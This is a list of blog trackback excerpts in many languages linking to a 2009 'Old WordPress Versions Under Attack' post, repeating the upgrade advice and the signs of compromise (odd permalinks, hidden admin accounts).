  197. [...] maggiori informazioni: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ Non ci sono ancora commenti a questo [...]

  198. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  199. [...] کس مطمئن نبود تا اینکه یکی از غول‌های دنیای وردپرس، lorelle پستی در این‌باره نوشت. حالا شما یک راه بیشتر ندارید [...]

  200. [...] Ursache: ein Virus; Details siehe unter diesem Link. [...]

  201. [...] WordPressu so pripravili podrobna navodila za učinkovito preventivo in kurativo. Osebno ob rednem posodabljanju priporočam še naslednje [...]

  202. [...] Old WordPress Versions Under Attack « Lorelle on WordPress Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!! [...]

  203. [...] a nasty worm that’s going around attacking all older versions of WordPress. Ominous security advisories [...]

  204. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  205. [...] Read at Lorelle on WordPress [...]

  206. [...] dass dein Blog bereits “infiziert” wurde, sind laut lorelle Veränderungen in der WP Permalink Struktur [...]

  207. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ <– oh, look, wordpress is getting p0wned en-masse. again. [...]

  208. [...] How do you know you have been attacked?  Here is the explanation from Lorelle’s WordPress blog: [...]

  209. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  210. [...] a nasty worm that’s going around attacking all older versions of WordPress. Ominous security advisories [...]

  211. [...] info e approfondimenti rimando alla notizia ufficiale su Lorelle e in italiano su [...]

  212. [...] Read at Lorelle on WordPress [...]

  213. [...] been a big fuss lately over the latest WordPress hacks that have targetted older versions of [...]

  214. [...] ажурирање на истата. Предупредувањето дојде од Lorelle on WordPress oткако откриле дека се пробиени безбедносните дупки [...]

  215. [...] so: oh my god. i just manually upgraded two wordpress installations in under 15 minutes. (if you run wordpress and haven’t already upgraded to 2.8.4, you need to do it now!) [...]

  216. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  217. [...] della domenica #1 6 Settembre 2009, 14:59 Archiviato in: Generale, WordPress – Old WordPress Versions Under Attack – How to Keep WordPress Secure – Aggiornate, aggiornate, poi non dite che non ve lo avevamo detto – [...]

  218. [...] Old WordPress Versions Under Attack [...]

  219. [...] کس مطمئن نبود تا اینکه یکی از غول‌های دنیای وردپرس، lorelle پستی در این‌باره نوشت. حالا شما یک راه بیشتر ندارید [...]

  220. [...] è uno dei segni che consente di capire se si è stati attaccati (ulteriori dettagli in questo post di Lorelle [...]

  221. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  222. [...] are here (and also on WordPress’s [...]

  223. [...] Old WordPress versions under attack Here’s a pretty detailed post about the vulnerability and how to detect it, fix it and keep yourself safe. [...]

  224. [...] hosted on my servers, you are up to date. Why? Because I make sure of it. For the rest of you, do your part, so I don’t have to. Because my part will be making your blog secure, but it will also be sending you a sizable [...]

  225. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  226. [...] lorelle – old wordpress version under attack [...]

  227. [...] (See the Rest of the Story at Old WordPress Versions Under Attack.) [...]

  228. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  229. [...] more details at Lorelle’s blog: Old Versions of WordPress Under Attack. There’s also detailed instructions on how to recover if you’ve been attacked and [...]

  230. [...] 2.0 News We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  231. [...] Read at Lorelle on WordPress [...]

  232. [...] are two clues that your WordPress site has been [...]

  233. [...] strongly recommended. Luckily I haven’t been hit by the attack that’s been going [...]

  234. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  235. [...] بحث از یک حفره امنیتی در وردپرس است که باعث شده یک وبلاگنویسی با هکرها گرفتاری پیدا [...]

  236. [...] problem we mentioned above is being widely discussed in posts like How to Keep WordPress Secure and Old WordPress Versions Under Attack. Although our customers have been protected against this particular new attack since August 12, as [...]

  237. [...] Old Worldpress Versions Under Attack [...]

  238. [...] me to explain. Yesterday I got this rather frightening warning to upgrade asap to the next version (2.8.4) of WordPress (that’s the system upon which this [...]

  239. [...] seu WordPress! Mais detalhes sobre os ataques Mais informações no blog do WordPress WordPress blogs under attack from hack attack (onde vi a [...]

  240. [...] worm has been spreading that breaks sites running out of date versions of WordPress by attacking a vulnerability fixed nearly a month ago. If you have a web site, you have a [...]

  241. [...] info: Old WordPress Versions Under Attack WordPress Permalink & Rss problems How to Keep WordPress Secure This entry was written by [...]

  242. WordPress Under Attack : Users Advised to Upgrade Immediately …

    Important security warning for all WordPress users, If you are using WordPress a very popular blog publishing application then you are adviced to upgrade immediately with latest version 2.8.4……

  243. [...] Mashable, Lorelle Una segunda pista es un usuario del tipo administrador llamado “Administrator (2)” o [...]

  244. [...] of all the customization I did on this blog but the other day there was news of a really nasty exploit that targeted all WordPress installations before the current one and I got my ass in [...]

  245. [...] Old Versions of WordPress Under Attack [...]

  246. [...] hat sich eine Kleinigkeit geändert. Wegen der aktuellen Sicherheitsbedrohung älterer WordPress-Installationen (womit alle außer der aktuellen Version 2.8.4 [...]

  247. [...] la fonte di questa segnalazione, ci sono alcune operazioni da effettuare per ripulire e ripristinare un blog [...]

  248. [...] Un résumé de la situation et des solutions existantes par Lorelle [...]

  249. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  250. [...] われわれはWordPressの旧版にはセキュリティー上の重大な脆弱性があるという報告を多数聞いている。WordPressは最大のブログ・エンジンの一つだ。最新のバージョン2.8はすでに531万7360回ダウンロードされている。われわれTechCrunchを含め、多くの大規模なブログがWordPressをブログ・プラットフォームとして利用している。 [...]

  251. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  252. [...] the announcement WordPress warns readers to upgrade immediately before reading their complete post it is that serious. Consider this comment from the official [...]

  253. [...] access the guts of your blog, databases and all. How do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  254. [...] è quello di esportare il database, e reinstallare WordPress utilizzando l’ultima versione. (via) Tweet This!Share this on FacebookShare this on FriendFeedStumble upon something good? Share it [...]

  255. [...] access the guts of your blog, databases and all. How do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  256. [...] darüber gemacht, wie es bei WordPress zukünftig weitergeht. Zwischenzeitlich kursiert sogar ein Wurm, welcher zwar ausschließlich ältere WordPress-Versionen betrifft – es ist allerdings schon [...]

  257. [...] to Lorelle, there are two ways that you can know if your WordPress has been [...]

  258. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  259. [...] like a nasty WordPress bug/worm is on the rampage. Please update your WordPress blogs! I’ve updated this one, and my other [...]

  260. [...] all the wrong things like giving their users a 14-step process for upgrade, the following Jewel came up: 4. WordPress is Not Secure: WordPress is incredibly secure and monitored constantly by experts in [...]

  261. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  262. [...] to Lorelle, there are two ways that you can know if your WordPress has been [...]

  263. [...] checking on my WP Dashboard, I came across Lorelle’s post that warned WordPress users about old WordPress versions being attacked. From that post, I learned that there are reports of attacks on older versions of WordPress and [...]

  264. [...] Lorelle: Old WordPress Versions Under Attack [...]

  265. [...] Un résumé de la situation et des solutions existantes par Lorelle [...]

  266. [...] of WordPress. I found out about the problem through Lorelle’s twitter account where she linked to an article on her blog covering the details of the attack. Mark Ghosh of WeblogToolsCollection.com quickly [...]

  267. [...] Old WordPress Versions Under Attack (Lorelle VanFossen) [...]

  268. [...] Attack 7Sep2009 Filed under: Crisis, Virus and other problems Author: admin There are numerous reports that older versions of WordPress are exposed to security threats. You probably know that WordPress [...]

  269. [...] are here (and also on WordPress’s [...]

  270. [...] è comparso sul blog “Lorelle“, dove è stato scoperto il bug che permette alle versioni precedenti di WordPress di creare un [...]

  271. [...] gestern wurde auf Lorelle`s Blogeintrag hingewiesen, das es derzeit eine große Angriffswelle auf WordPress-Blogs, auf denen [...]

  272. [...] long story short:  UPDATE YOUR WORDPRESS RIGHT NOW. There is a major WordPress hack going around targeting older versions of WordPress.  The latest version is unaffected so if you [...]

  273. [...] den neusten Stand zu bringen. Ob der eigene Blog bereits infiziert wurde, kann, laut Aussage von Lorelle, wie folgt festgestellt [...]

  274. [...] dazu gibt es hier oder auch hier. Du kannst Beiträge dieses Blogs per RSS-Feed abonnieren oder einen Trackback auf deiner [...]

  275. [...] ich nicht beurteilen, wer aber herausfinden will, ob auch sein Blog betroffen ist der findet bei Lorelle weitere Informationen. Auch Matt hat sich dem Thema angenommen und erinnert nochmals dringlich [...]

  276. [...] Källor: WP-Support, Lorelle on WordPress [...]

  277. [...] sito Lorelle ha lanciato l’allarme sulla vulnerabilità del software di [...]

  278. [...] Lorelle [...]

  279. [...] There’s a major attack going around that targets older versions of WordPress. Lorelle has the full details. There are two clues that your WordPress site has been [...]

  280. [...] Old WordPress Versions Under Attack by Lorelle [...]

  281. [...] grundig gennemgang af, hvor vigtigt det er at få opdateret til ny version findes på bloggen Lorelle on WordPress. Her vises også, hvorledes man kan se, om ens blog er [...]

  282. [...] how you can check if you’re already being attacked: There are two clues that your WordPress site has been [...]

  283. [...] me scris de tapirul September 7, 2009 @ 5:00 am alte alea Blogosfrera este, pare-se, Under Attack. NU numai de catre domnhul alex leo serban, ci de catre alte alea. Ce ma amuza cel mai tare este [...]

  284. Two Ideas for Mitigating Future WordPress Vulnerabilities…

    This weekend there has been a plethora of news stories about pre-2.8.4 versions of WordPress being hacked (Lorelle, Matt or the Guardian). The official way to protect yourself is to install an upgraded version of the system.
    My first suggestion: The ad…

  285. [...] Und hier auch noch ein Blog-Pos von Matt Mullenweg zur besseren Sicherung von WordPress-Systemen: How to Keep WordPress Secure. Zudem gute Links gibt es von Mashable oder auch von der gute alten Lorelle bei WordPress.com. [...]

  286. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  287. [...] แหล่งข่าวต่างประเทศ แจ้งเตือนมาแล้วครับ ให้รีบอัพเกรด WordPress เป็นรุ่นล่าสุดโดยไว (ดีหน่อยที่ผมอัพเกรดก่อนไปหลายวัน) สำหรับคนที่ยังใช้รุ่นต่ำกว่า 2.8.4 อยู่ เพราะมีแฮคเกอร์มือดี สามารถเจาะระบบเข้าไปสร้าง User ในระดับ Admin ได้ ขออย่าชะล่าใจนะครับเพื่อนๆ ปัญหาร้ายแรงอาจตามมา เช่น Spam Content สร้างเนื้อหาขยะ ความคิดเห็นขยะ ที่มีแต่ลิงค์กับลิงค์ หรือเป็นภาษาที่อ่านไม่รู้เรื่อง [...]

  288. [...] Lorelle recommends: 1. UPDATE NOW! Reports are that this attack impacts ALL versions of WordPress up to 2.8.4, the most recent release. [...]

  289. [...] För mig är det en självklarhet att alltid köra med senaste versionen, detta är lika viktigt som att ha senaste uppdateringarna för ditt antivirusprogram, din brandvägg, och sist, men inte minst, för Windows. Sen försöker jag att vara uppdaterad avseende alla tillägg jag använder. Mer läsning om hackerattacken hos WP-Support Sverige samt hos Lorelle on WordPress. [...]

  290. [...] noen ønsker å lese mer om problemene denne ormen forårsaker, så kan dere lese enten denne bloggen her, eller Matt Mullenwegs egen blog på [...]

  291. [...] to use it. While it doesn’t remove responsibility completely, to WordPress’ credit, this most recent issue took hold only on outdated versions of WordPress. If you have been keeping your WordPress [...]

  292. [...] il problema ieri su Lorelle On WordPress e oggi in maniera indiretta da Matt sul blog ufficiale, questa vurnerabilità trova la sua unica [...]

  293. [...] Wochenende liefen auf einmal die Drähte heiß, eine Sicherheitslücke in praktisch allen verbreiteten WordPress-Installationen mache ein sofortiges Update auf die neueste Version dringend nötig. Eigentlich kein Ding. Leider [...]

  294. [...] Lorelle has more details and suggestions on how to clean up your blog if it was hacked. [...]

  295. [...] Old WordPress Versions Under Attack [...]

  296. [...] do WordPress Um novo tipo de ataque contra blogs que rodam sob WordPress foi descoberto, segundo Lorelle VanFossen. Ele afeta blogs que rodam versões desatualizadas do WordPress (anteriores à 2.8.4), e o número [...]

  297. [...] nicht unbedingt notwendiger Zusätze. Die Disskusion um eine Light-Version auch oder gerade wegen Sicherheitsbedenken ist im vollen Gange. Eine stabile und sichere Core-Version, entschlackt und variabel erweiterbar [...]

  298. [...] è uno dei segni che consente di capire se si è stati attaccati (ulteriori dettagli in questo post di Lorelle VanFossen). [...]

  299. [...] more information about the current attacks and a list of WordPress security resources you can visit Lorelle on WordPress. Similar Articles:WordPress 2.8.2WordPress Updates & Converting to SVNWordPress 2.6 [...]

  300. [...] that I have your attention….  Go to Lorelle’s site, Robert Scoble’s site and the WordPress Dev Blog to see details of this new [...]

  301. [...] I should drop this to the members here. I am sure most of us are running some form of wordpress: Old WordPress Versions Under Attack Lorelle on WordPress Upgrade if possible. I did last night on our production blogs. Jaysunn __________________ [...]

  302. [...] are two strange things as reported by Lorelle on WordPress that you should look for to see whether your blog is affectede or not [...]

  303. [...] I also read a great article about this at Lorelle on WordPress. [...]

  304. [...] are here (and also on WordPress’s site). As Matt Mullenweg, who has played a key part in the [...]

  305. [...] are here (and also on WordPress’s site). As Matt Mullenweg, who has played a key part in the [...]

  306. Incident: Compromission du blog de Jean-Luc Mélenchon…

     
    Clarifions bien la situation dès le départ. Cet incident ne cible pas spécialement Jean-Luc Mélenchon : président du Parti de Gauche (PG). Les attaques de masse frappent systématiquement les systèmes de gestion de contenu (CMS) vulnérables à…

  307. [...] recent alert went out about a worm invading WordPress blogs that aren’t updated.  This alert is real and [...]

  308. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  309. [...] WordPress in the past year. But there’s nothing as motivating as getting forwarded a link containing, Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is [...]

  310. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  311. [...] Lorelle a WordPress ofereix dues vies de saber-ho: [...]

  312. [...] resources about the attacks already out there. “Lorelle on WordPress” has an extensive post about symptoms and remediation. From her post: How Do I Know If My Site Has Already Been [...]

  313. [...] einem Blogeintrag von Lorelle gibt es derzeit eine große Angriffswelle auf WordPress-Blogs. Daher sei gesagt: Nur die aktuellste [...]

  314. WordPress är under attack!…

    Bloggverktyget WordPress, som är det mest populära fristående bloggverktyget på marknaden idag, är under attack av elaka hackare. De ger sig på äldre versioner av WordPress och genom att utnyttja säkerhetshål förändrar de länkar och lägger in nya admin…

  315. [...] are here (and also on WordPress’s [...]

  316. [...] now that is growing by the hour. WordPress Attack Underway: WordPress Users Must Upgrade [ALERT] Old WordPress Versions Under Attack Lorelle on WordPress WordPress › Blog How to Keep WordPress Secure WordPress › Blog WordPress 2.8.4: [...]

  317. [...] This new exploit seems to create a ‘fake’ administrator (which you cannot see) within WordPress which may change URLs or abuse other parts of your site. Please see the following links for reference: WordPress 2.8.4 Security Release Mashable – WordPress Attack Underway Lorelle on WordPress [...]

  318. [...] the information from WordPress on how to keep your site safe, and read Lorelle’s post to find out if you have been [...]

  319. [...] Lorelle has pointed out two ways to test if you’ve been attacked: [...]

  320. [...] Jeff Johnson, The Detroit Toilet And WordPress Vulnerability I’m guessing a huge proportion of WordPress users where hit by the recent wordpress problem, you can find out more about it here: Old WordPress Versions Under Attack. [...]

  321. [...] WordPress Blogs Get Attacked Last week a good chunk of WordPress blogs were finding that they were getting attacked from hackers. Those who had not been keeping up with the latest WordPress updates were vulnerable to the attack, and as a result a hacker could create an administrator account on the affected site. If you’re running the latest 2.8.4 release, however, you have nothing to worry about. [...]

  322. [...] Come riportato nel blog di Lorelle, una “blog evangelist” esperta tra le  altre cose di WordPress, tutte le versioni precedenti alla 2.8.4 sono  soggette ad un bug di sicurezza che permette di creare un amministratore nascosto e quindi aprire il proprio blog a qualsiasi tipo di attività : http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  323. [...] as of this writing) to avoid an exploit which may place your blog or web site at risk. See the article at "Lorelle on WordPress" for more info. Either use the upgrade link on your WordPress blog's control panel, or download and [...]

  324. [...] high profile WordPress blogs that were not updated.  John Gruber over at Daring Fireball has jumped into the fray with some posts on the subject including this new one titled “How Not to Get  Your Blog [...]

  325. [...] Lorelle [...]

  326. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  327. [...] 警告! WordPress旧版は簡単に乗っ取られる―即刻アップデートを (この記事の元記事はコチラ→Old WordPress Versions Under Attack) [...]

  328. [...] Old WordPress Versions Under Attack « Lorelle on WordPress (tags: wordpress security) [...]

  329. [...] Dettagli a questo link. [...]

  330. [...] Old WordPress Versions Under Attack [...]

  331. [...] Come riportato nel blog di Lorelle, una “blog evangelist” esperta tra le  altre cose di WordPress, tutte le versioni precedenti alla 2.8.4 sono  soggette ad un bug di sicurezza che permette di creare un amministratore nascosto e quindi aprire il proprio blog a qualsiasi tipo di attività : http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  332. [...] are some ways you can find out if your blog has been hacked, mentioned by Lorelle: There are strange additions to the pretty permalinks, such as [...]

  333. [...] do you know if your blog has been hacked? Lorelle On WordPress says: There are strange additions to the pretty permalinks, such as [...]

  334. [...] you use self-hosted WordPress for your blog and you’re not using the latest version, 2.8.4, you’re running a severe risk of your site security being compromised and even [...]

  335. [...] If you use WordPress for blogging, you should make absolutely sure you’ve upgraded to the late… [...]

  336. [...] not going to repeat the already excellent advice that people like Lorelle on WordPress have offered. If you have a WordPress blog yourself, you shouldalso read Matt Mullenweg’s tips on securing [...]

  337. [...] Old WordPress Versions Under Attack: Older version of WordPress are being attacked and characters are being added to the permalinks. Sure signs of the attack include strange characters in your permalinks (single posts do not work) and an extra administrator account in the users control panel which you cannot see. Look for the administrator count in brackets at the top. Is the number there what you would expect on your blog? [...]

  338. [...] [...]

  339. [...] in what the attack was lead me to do a little investigation.  For what I read, go to these blogs: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ and [...]

  340. [...] I heard the news about the latest WordPress exploit in Lorelle’s alarmingly titled “Old WordPress Versions Under Attack” post.  I especially appreciated the warning,” “Update your WordPress blog [...]

  341. [...] Old WordPress Versions Under Attack [...]

  342. [...] dado pelo desenvolvedor de WordPress Otto42 na última sexta-feira dia 4 de setembro e vem sendo amplamente divulgado. O alcance do ataque é grande e atinge todas as versões até a 2.8.2, portanto siga o conselho [...]

  343. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  344. [...] Old WordPress Versions Under Attack « Lorelle on WordPress UPGRADE! sorry. didn't mean to yell. But cleaning your corrupted install sucks a nut. (tags: wordpress-security secure alert hacker hackers lorelle wp-security) [...]

  345. [...] Attack WordPress – Old Version Hi all, Stumbled on this update: Old WordPress Versions Under Attack Lorelle on WordPress from this guy: Vita Vee's Affiliate Profits Club I'm subscribed to his mailing list… hope it [...]

  346. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  347. [...] Old WordPress Versions Under Attack [...]

  348. [...] reading on this hack and WordPress security issues: Lorelle – Old WordPress Versions Under Attack WordPress Spam Hack Alert WordPress forum thread – eval(base64_decode(…)) in permalinks [...]

  349. [...] WordPress Blog, like this one, then you need to be aware of a new attack.   Take  a look at Lorelle on WordPress for details.  If you haven’t upgraded to WordPress 2.8.4 then your blog is vulnerable to [...]

  350. [...] is a very good post by Lorelle on her blog titled “Old WordPress Versions Under Attack” – it is well worth the read and there are plenty of references that will enable a follow [...]

  351. [...] The main reason to upgrade was to fix the security hole in the wordpress versions before 2.8.4. The warnings were spread over the internet that it is a serious attack.  According to some analysis the threat [...]

  352. [...] kann an zwei Methoden erkennen, ob die eigene Seite infiziert worden ist. Zum einen werden die URLs verändert und enthalten [...]

  353. [...] is a particularly nasty WordPress attack making the rounds right now which Lorelle talks about on her blog. If you are not running the latest version of WordPress (2.8.4), you should upgrade immediately. If [...]

  354. [...] [...]

  355. [...] weekend the big story was about a widespread hacker attack against WordPress blogs. If you read CN, you know that my sites have been exploited so many times, [...]

  356. [...] development blog posted a response encouraging users to keep their blogs upgraded. Lorelle has posted some information about the attacks that are going on against WordPress sites. In short: upgrade, just do [...]

  357. [...] gentage, hvad han allerede havde sagt til mig – opdatér til NYESTE version af WordPress, for det er netop de ældre versioner, det er gået ud over i dette raid. Og ja min Finishfirst.dk er også opdateret nu!!! Det ironiske er, at jeg havde besluttet, at det [...]

  358. [...] satu blog yang menyebutkan masalah keamanan ini adalah Lorelle di artikelnya Old WordPress Versions Under Attack, dan menyarankan segera upgrade ke versi 2.8.4 sebelum membaca artikelnya karena begitu bahayanya [...]

  359. [...] was a little kersnaffle with WordPress last weekend – Lorelle describes it well there – and I always trust the very cool Lorelle- that there were some [...]

  360. [...] – Old WordPress Versions Under Attack – How to Keep WordPress Secure [...]

  361. [...] upgrading, may allow remote attacker to get in.  I recommend further reading to this post, “Old WordPress versions under attack” by Lorelle. Leave a [...]

  362. [...] “Wurm” angeht, gibt es verschiedene Möglichkeiten das zu überprüfen. Erster Anhaltspunkt sollte sein, sich die Permalinks von WordPress anzuschauen. Haben diese komischen Code am Ende, so [...]

  363. [...] social media savvy, DjangoCon, AT&T infrastructure woes, Seth the blogger guy, Foursquare, and WordPress attacks and WordPress real-time RSS with RSS [...]

  364. [...] Mais informação sobre o worm, o que fazer, e como limpar a invasão, no Lorelle On WordPress: Old WordPress Versions Under Attack [...]

  365. [...] morning, the answer finally came to me in an email – a WordPress security exploit.  Months of suspicions proved true and I was left to carefully analyze the server database for [...]

  366. [...] I am home sick today. I am catching up on my television and decided to upgrade WordPress due to a security issue that cropped up last week. If you haven’t heard, Lorelle on WordPress gives a good overview of it: There are two clues that your WordPress site has been attacked. There are strange additions to the p… [...]

  367. [...] novo tipo de ataque contra blogs que rodam sob WordPress foi descoberto, segundo Lorelle VanFossen. Ele afeta blogs que rodam versões desatualizadas do WordPress (anteriores à 2.8.4), e o número [...]

  368. [...] in mind that if your WordPress installation already has the worm, upgrading will not fix it (How to tell if your installation has been hacked). Restoring a website that has been attacked by a worm is much more difficult than preventing the [...]

  369. [...] these three source(JinnatulHasan, TechCrunch and Lorelle)I noticed that wordpress blogs are under attack.As the wordpress is the largest blogging engine [...]

  370. [...] resources about the attacks already out there. “Lorelle on WordPress” has an extensive post about symptoms and remediation. From her post: How Do I Know If My Site Has Already Been [...]

  371. [...] are some ways you can find out if your blog has been hacked, mentioned by Lorelle: There are strange additions to the pretty permalinks, such as [...]

  372. [...] Old WordPress Versions Under Attack [...]

  373. [...] Lorelle on WordPress] AKPC_IDS += [...]

  374. [...] light of the recent security problem, I will follow his advice. So, as of today, all my plugins will only be tested on the latest stable [...]

  375. [...] then I heard about how old wordpress versions were under attack, and resolved to tear down all three main blogs here (Daily Flash Fiction and LifeLacking being the [...]

  376. [...] cosa, superamento dei filtri da parte del webmaster). Trovate la notizia per intero facendo clic QUI.Comunque tranquilli: io sono quasi maniacale nell’aggiornamento del blog: spero che [...]

  377. [...] More over now, Every blogger and webmaster in the world who uses wordPress are bombarded with many posts to security this, security that from every single wordpress developers and enthuciasists. Some developers Offers Help (he himself need help now ).  Some others Screaming to upgrade “after get hacked”  and a “LOT more” [...]

  378. [...] que nada fosse alterado no blog (pelo menos não por mim – há notícias de ataques do WordPress en – pt). Primeiro passo, então foi atualizar o WP. Nada se alterou, não se tratava dos ataques. [...]

  379. [...] I was originally made aware of this issue on Twitter, as people started spreading the word about a vicious worm that was working it’s way through older, non updated installs of WordPress. So, as usual, I went surfing for some trustworthy information. The best description of what happened can be found in Lorelle’s blog. [...]

  380. [...] Hacked WordPress InstallationLorelle has a great recent compilation of how to diagnose a hacked WordPress blog, and how to fix it.I determined that what happened to my site wasn’t the new worm based [...]

  381. [...] has a great recent compilation of how to diagnose a hacked WordPress blog, and how to fix [...]

  382. [...] it won’t overwrite some of the scripts that the hackers have place using a backdoor exploit. Read more from Lorelle on what you need to do if you have been hacked. If you’re not particularly confident digging around in the files that you can only access [...]

  383. [...] it won’t overwrite some of the scripts that the hackers have place using a backdoor exploit. Read more from Lorelle on what you need to do if you have been hacked. If you’re not particularly confident digging around in the files that you can only access [...]

  384. [...] As a matter or precaution and courtesy, at no charge to you (and without causing alarm), I investigated all the websites in my care and found that MOST had been compromised including my own. If you have noticed a decline in website traffic, lower page rank or your adsense earnings have dropped off just recently, then they are the direct symptoms of this initial attack. Read more at http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  385. [...] have read other reports that say it is even more widespread than that [...]

  386. [...] non-updated plugins.  I was surprised a few weeks back when I read this post on Lorelle about Old WordPress Versions Under Attack.  I thought at first that the hack she talks about was new, and it’s not – it’s [...]

  387. [...] quote Lorelle: Update your WordPress blog before you continue reading this post. That’s how critical this issue [...]

  388. [...] the recent security scare that targeted older versions of WordPress, blame is being thrown around left and right, from [...]

  389. [...] who-knows-what, resulting in broken links, back doors, compromised accounts, and so on (you can read more on this worm if that kind of thing interests [...]

  390. [...] with stories of this hack. TechCrunch has an excellent post. And Lorelle on WordPress.com has some excellent suggestions for cleaning up a blog like this [...]

  391. [...] don’t have the latest version of wordress, NOW is the time to do it. The warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  392. [...] WordPress blog has been attacked, and how to respond to a WordPress attack. Read this blog entry, Old WordPress Versions Under Attack, at Lorelle on [...]

  393. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find out: There are strange additions to the pretty permalinks, such as [...]

  394. [...] rapid la blog-ul lui Matt Mullenweg, fondatorul WordPress, şi de-acolo pe Techcrunch, apoi la Lorelle şi de-aici la Journeyetc, am citit şi am trecut la treabă. Că e [...]

  395. [...] Lorelle on WordPress: Old WordPress Versions Under Attack Smackdown: How To Completely Clean Your Hacked WordPress Installation WordPress Blog: How to Keep [...]

  396. [...] to the newest 2.8.4 security update, just to make sure we’re safe from newest hacker attacks (more here). It took usmore than I imagined. After all the work has been done, I had to make sure everything [...]

  397. [...] Old WordPress Versions Under Attack [...]

  398. [...]  I just determined that tomorrowland.com has been infected. You can read about the attack here.  So the site might be up and down for a few days until I clean it up.  And then I’ll be on [...]

  399. [...] den aktuellen „Wurm“ angeht, gibt es verschiedene Möglichkeiten das zu überprüfen. Erster Anhaltspunkt sollte sein, sich die Permalinks von WordPress anzuschauen. Haben diese komischen Code am Ende, so [...]

  400. [...] which led me to the post. It sounds like this is directly related to running older versions of WordPress (this post is a very good overview; please check it out). So, yes, upgrading is crucial, but it [...]

  401. [...] Hacked site! Blog and links disabled. Need help repairing it. Never heard of Lorelle before. Amazing link. Thanks to Phillip Barron for pointing this out. Still need help!! __________________ [...]

  402. [...] Old WordPress Versions Under Attack [...]

  403. [...] Old WordPress Versions Under Attack [...]

  404. [...] Nu er det på tide at få opdateret vores WordPress versioner igen for en sikkerheds skyld. (se evt. Lorelles indlæg) [...]

  405. [...] I was originally made aware of this issue on Twitter, as people started spreading the word about a vicious worm that was working it’s way through older, non updated installs of WordPress. So, as usual, I went surfing for some trustworthy information. The best description of what happened can be found in Lorelle’s blog. [...]

  406. [...] went to WordPress support for suggestions, and found a few helpful links (Lorelle)(Donncha)   I learned from Lorelle –  btw, everyone who uses wordpress should know Lorelle!-  [...]

  407. [...] recently came under heavy fire because an Internet worm ran wild and it specifically targeted older versions of WordPress. Even popular bloggers such as Robert Scoble were hit hard by the worm. This whole fiasco did not [...]

  408. [...] weird URLs with “evalbase64″ in your server logs, it’s because there’s an organized attack underway against old WordPress [...]

  409. [...] update now and don’t be a Scoble. Tags:blog, [...]

  410. [...] Please update now and don’t be a Scoble. [...]

  411. [...] September 2009, a worm targeted old WordPress version blogs tore through the web leaving many frustrated and crippled with hacked blogs. The simple task of [...]

  412. [...] upgraded the blog to 2.9.1 and I recommend that you do the same var addthis_pub = ''; var addthis_language = 'en';var addthis_options = [...]

  413. [...] and delete the “admin” account. Given some security issues with WordPress in the past, it seems like a good piece of advice. But I won’t describe it here. I did do it in my [...]

  414. [...] update now and don’t be a Scoble. Tags:blog, Software Updates, [...]

  415. [...] Please update now and don’t be a Scoble. [...]

  416. [...] If you still run a version 2.8.4 or lower you should immediate upgrade your software to the latest one available. This warning comes from Lorelle on WordPress. [...]

  417. [...] http://wordpress.org/development/2009/09/keep-wordpress-secure/ * http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ * [...]

  418. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ (@Tweetmeme first alerted me to it) [...]

  419. [...] internet worm), hacked my site, which is based on Word Press (you can read about this type of issue here). While there is no apparent damage done, some people are reporting that their virus scanners are [...]

  420. [...] Come regola generale, nel caso d’uso di WP, è consigliabile disattivare (se non utilizzata) l’opzione “Abilitare i protocolli XML-RPC di pubblicazione WordPress, Movable Type, MetaWeblog e Blogger.” nel menu Impostazioni/Scrittura. Altri exploit per vecchie versione di WP sono descritti su Old WordPress Versions Under Attack. [...]

  421. [...] Old WordPress Versions Under Attack [...]

  422. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  423. [...] } Um novo tipo de ataque contra blogs que rodam sob WordPress foi descoberto, segundo Lorelle VanFossen. Ele afeta blogs que rodam versões desatualizadas do WordPress (anteriores à 2.8.4), e o número [...]

  424. [...] news, many WordPress blog are being attacked by hackers in the past few days and the numbers are growing by the hours. Reported by mashable, the newest vulnerability can affect any prior versions of WordPress (Before [...]

